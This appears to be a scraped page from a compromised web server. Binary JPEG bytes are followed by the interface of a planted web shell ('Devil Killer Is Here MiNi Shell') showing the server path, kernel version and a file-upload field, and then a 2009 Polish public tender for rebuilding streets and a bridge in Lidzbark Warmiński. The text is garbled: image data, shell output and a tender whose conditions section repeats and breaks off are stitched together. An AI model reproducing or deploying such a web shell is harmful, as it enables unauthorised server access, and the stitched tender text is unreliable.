JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090409/61061-N-2009.html

<p class="kh_header"><b>Lidzbark Warmiński: Przebudowę ulic i mostu w centrum Lidzbarka Warmińskiego - etap I</b><br>
<b>Numer ogłoszenia: 61061 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Lidzbarku Warmińskim , ul. Wyszyńskiego 20, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 767 00 10, faks 089 767 00 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowę ulic i mostu w centrum Lidzbarka Warmińskiego - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest przebudowa ulic w centrum Lidzbarka Warmińskiego, przebudowa mostu w ciągu ulicy Kopernika, przebudowa istniejącego uzbrojenia telekomunikacyjnego, budowa sieci kanalizacji deszczowej, wymiana sieci wodociągowej związanej z przebudową ulic w rejonie centrum miasta. Przebudowa ulic obejmuje całkowitą wymianę nawierzchni jezdni i chodników. 

1. Wykonanie robót budowlanych objętych kontraktem Etap I obejmuje realizację następującego zakresu: 
a) Zakres robót Etap I-szy obejmuje następujące ulice:
- ulica Kopernika droga powiatowa nr 2714N (od ul. Zamkowej do mostu ) - 90m;
- ulica Kasprowicza droga powiatowa nr 2709N (odcinek od ul. Prostej do ul. Rej) - 90m ;
- ulica Reja droga powiatowa nr 2725N - 280m;
- ulica Prosta droga powiatowa nr 2723N, odcinek od ul. Mickiewicza do ul. Kajki- 165m;
- ulica Zamkowa droga powiatowa nr 2738N - 150m;
- ulica Kajki droga powiatowa nr 2707N - 165m.
Zakres przebudowy układu drogowego:
- przebudowa geometrii ulic jw.;
- wyznaczenie głównych ciągów komunikacyjnych;
- przebudowa nawierzchni ulic, chodników i parkingów;
- wyznaczenie miejsc postojowych;
- organizacja ruchu drogowego;
- poprawa bezpieczeństwa ruchu drogowego;
- przebudowa skrzyżowań;
- wzmocnienie istniejącej konstrukcji nawierzchni;
- utwardzenie zjazdów na posesje;
- odwodnienie poprzez przebudowę kanalizacji deszczowej;
- oświetlenie wszystkich ciągów komunikacyjnych.

b) Zakres robót Etap I-szy obejmuje następujące uzbrojenie:
1. Sieć wodociągową związaną z przebudową ulic w rejonie centrum miasta, z przyłączami do posesji zlokalizowanych wzdłuż ulic w m. Lidzbark Warmiński .

2. Kanalizację  deszczową.- wpusty deszczowe z osadnikami piasku średnicy 500mm , oraz trzy odcinki kanalizacji deszczowej sprowadzającej wody opadowe do urządzeń oczyszczających:
osadnika piasku i łapacza ropopochodnych.

3. przebudowę istniejącej kanalizacji kablowej i linii kablowych podziemnych branży telekomunikacyjnej w obrębie ulic wymienionych powyżej w związku z przebudową układu drogowego.

4. przebudowa gazociągu:  
- przebudowa odcinka gazociągu n.c. z rury PE 160 x 9,1 mm o długości L = 17 m,
- przebudowa odcinka przyłącza gazu n.c. z rury PE 63 x 5,8 mm o długości L = 1 m,
- przebudowa odcinka przyłącza gazu n.c. DN 80 ST na przyłącze z rury PE 110 x 6,3 mm o
długości L = 14 m,
- zabezpieczenie gazociągu DN 150 ST przechodzącego pod planowanym parkingiem za
pomocą osłonowej połówkowej rury DN 250 ST o długości L = 15 m.

5. przebudowa oświetlenia ulic i sieci elektroenergetycznych;

6. przeniesienie sieci ciepłowniczej - wykona PEC Lidzbark Warmiński. Wykonawca ma obowiązek udostępnić teren  do wykonania przekładki sieci ciepłowniczej.
7. Konstrukcja nośna mostu w postaci trzech łuków ceglanych oparta jest na istniejących przyczółkach i filarach. Rozpiętość sklepień Ls = 6,90 m przy strzałce wzniesienia łuku f = 1,35 m. istniejąca szerokość sklepienia 7,55 m, a grubość całkowita łuku h = 60 cm. nad łukami zaprojektowano żelbetonową płytę odciążającą grubości 25 cm pod jezdnię wraz z wspornikami pod chodniki. długość całkowita mostu liczona w świetle nowej konstrukcji Lc = 27,15 m. Światło mostu pozostaje bez zmian i wyniesie Lśw = 3 x 6,90 = 20,70 m. Od strony muru kościelnego zaprojektowano nowy wspornik pod chodnik zakotwiony w istniejącym murze oporowym o długości L = 11,48 m. od strony ulicy Zamkowej na długości L = 10,24 m zaprojektowano nowy wspornik pod chodnik zakotwiony w istniejącym murze oporowym.
Całkowita długość obiektu liczona pomiędzy skrajnymi elementami nowej konstrukcji mostowej wynosi L całkowite = 48,88 m. Most zaprojektowano na obciążenie taborem samochodowym klasy B wg PN - 85/S - 10030. Pod wspornikami z obu stron mostu zaprojektowano po sześć rur przepustowych dla kabli energetycznych i telekomunikacyjnych zakończonych komorami połączeniowymi. W przestrzeni pomiędzy ściankami żwirowymi pod jezdnią zaprojektowano rury ochronne dla przeprowadzenia sieci wodociągowej o rurociągu tłocznego sanitarnego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 100 000,00 PLN (słownie: sto tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1)	posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 u.p.z.p. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich);
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
2)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby  wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności:
          Przedstawiciel Wykonawcy (kierownik Kontraktu) - posiadającej wyższe wykształcenie, co najmniej 5 lat doświadczenia zawodowego przy realizacji inwestycji budowlanych, przy czym co najmniej jeden kontrakt w zakresie inżynierii komunikacyjnej zakończony i rozliczony według procedur FIDIC lub równoważnych (doprowadzony do wystawienia Świadectwa Przejęcia) o wartości robót brutto co najmniej 10,0 mln. PLN, posiadającej znajomość języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie. W zakresie wymogu znajomości języka dopuszcza się zmianę tego warunku na zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym a Kierownikiem Kontraktu,
Co najmniej 2 lata z powyższego doświadczenia  dotyczyć muszą projektów inwestycyjnych wg  międzynarodowych standardów kontraktów budowlanych typu FIDIC, NEC ECC - na stanowiskach Dyrektor Kontraktu, Kierownik Budowy lub równorzędnych.
          co najmniej 1 osoby na stanowisku Kierownik Budowy, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót  inwestycji drogowo -mostowych , liczone od momentu uzyskania uprawnień, przy czym co najmniej jeden kontrakt zakończony i rozliczony (doprowadzony do wystawienia Świadectwa Przejęcia), o wartości robót  brutto co najmniej 7,0 mln. PLN. 
     Co najmniej rok z powyższego doświadczenia  dotyczyć musi projektów inwestycyjnych wg międzynarodowych standardów kontraktów budowlanych typu FIDIC, NEC ECC - na stanowiskach  Kierownik Budowy, Kierownika robót  lub równorzędnych.
          co najmniej 1 osoby na stanowisku Kierownik Robót mostowych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowo - mostowej, lub odpowiadające im Ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności drogowo - mostowej , liczone od momentu uzyskania uprawnień, przy czym co najmniej jeden kontrakt zakończony i rozliczony (doprowadzony do wystawienia Świadectwa Przejęcia), o wartości robót brutto co najmniej 2,5 mln. PLN. 

         co najmniej 1 osoby na stanowisku Kierownik Robót Sanitarnych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności sanitarnej, , liczone od momentu uzyskania uprawnień, w tym uczestniczącej w  realizacji inwestycji drogowych .

          co najmniej 1 osoby na stanowisku Kierownik Robót Elektrycznych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności elektrycznej, , liczone od momentu uzyskania uprawnień, w tym uczestniczącej w  realizacji inwestycji drogowych .

           co najmniej 1 osoby na stanowisku Inspektora ds. Rozliczeń posiadającej 3-letnie doświadczenie zawodowe w obmiarach i wycenie robót budowlanych, rozliczaniu robót w kontraktach na wykonanie robót wg warunków FIDIC lub innych uznanych międzynarodowych standardów kontraktów obmiarowych.
Co najmniej 2 lata z powyższego doświadczenia obejmować ma pracę na stanowisku samodzielnego inspektora ds. rozliczeń lub równoważnym, w tym przy rozliczaniu co najmniej jednego kontraktu drogowo - mostowego o wartości brutto robót co najmniej 7,0 mln. PLN.  
Dla kontraktów określonych w innych walutach niż PLN należy podać równowartość kontraktu w PLN przeliczoną wg kursu średniego NBP na dzień wystawienia Świadectwa Przejęcia. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami nt. kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW, oraz dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia w tym dokumenty poświadczające posiadanie wymaganych uprawnień budowlanych i aktualne na dzień otwarcia ofert świadectwa przynależności do Okręgowej Izby Inżynierów Budownictwa. Wykonawca może wykazać doświadczenie zawodowe załączając do Oferty proponowany przez Zamawiającego wzór CV według wzoru stanowiącego załącznik nr 3.1. do niniejszej IDW;
b)	wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
-	co najmniej 1 robotę budowlaną, której przedmiotem było wykonanie w oparciu o warunki FIDIC budowy, przebudowy drogi klasy nie niższej niż L (mogą być również zlokalizowane na obszarze zabudowy) o wartości nie mniejszej niż 8,0 mln. PLN. brutto. 
Dla kontraktów określonych w innych walutach niż PLN należy podać równowartość kontraktu w PLN przeliczoną wg kursu średniego NBP na dzień wystawienia Świadectwa Przejęcia. 

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie, 

c) posiada lub ma  dostęp do urządzeń i sprzętu niezbędnego do Wykonania robót tzn.

1.Wytwórnia mas bitumicznych o wydajności minimum 100 Mg na h zlokalizowana w odległości gwarantującej czas transportu spełniający wymagania SST. - Min. Liczba jednostek: 1
2 Układarka do mas bitumicznych szerokości minimum 4 m - min. liczba
jednostek: 1
3 Walec stalowy - min. Liczba jednostek: 2

3)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): 

a)	Wykonawca osiągnął w ostatnich 3 latach obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, łącznie przychód netto ze sprzedaży w wysokości co najmniej 5 000 000 zł

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć rachunek zysków i strat, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające przychody - za okres ostatnich 3 lat obrotowych (2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
b)	posiadać środki finansowe w wysokości co najmniej 1 500 000,00 zł lub posiadać zdolność kredytową w wysokości co najmniej 1 500 000,00 zł. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości, 
		c) 	posiadać aktualną polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 2,5 mln zł.,
4)	złożyć oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszych IDW, o spełnianiu warunków udziału w postępowaniu (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w/w dokument powinien być złożony oddzielnie przez każdego z Wykonawców składających ofertę wspólną art. 23 ust. 3 ustawy Pzp).
5. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605 ZE ZM. ) w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w  pkt. 9.1.1).a), 9.1.1).b) i 9.1.1).d), składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa powyżej w pkt. 9.1.1).c) - składa oświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3)	Dokumenty, o których mowa w pkt. 9.2.1).a) i c) oraz 9.2.2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 9.2.1).b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 9.2.1) i 9.2.2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis pkt. 9.2.3) stosuje się odpowiednio.
b) wykazywanych w walutach obcych do obliczania przychodu, wartości wykonywanych robót, posiadanych środków finansowych lub zdolności kredytowej należy przyjąć średni kurs NBP z dnia ukazania się ogłoszenia w Dzienniku Urzędowym Unii Europejskiej. Przeliczenia dokona Zamawiający.
c) przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia. 
4.9. . Wykonawcy wspólnie ubiegający się udzielenie zamówienia. 

1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 IDW. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokument ustanawiający Pełnomocnika powinien być załączony do oferty. Pełnomocnictwo powinno jednoznacznie określać postępowanie do którego się odnosi i precyzować zakres umocowania. Z pełnomocnictwa powinna wynikać wola wszystkich współwykonawców o ich wspólnym występowaniu  w postępowaniu. Zaleca się by pełnomocnictwo wymieniało wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia
1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1)	posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 u.p.z.p. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich);
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich),
2)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
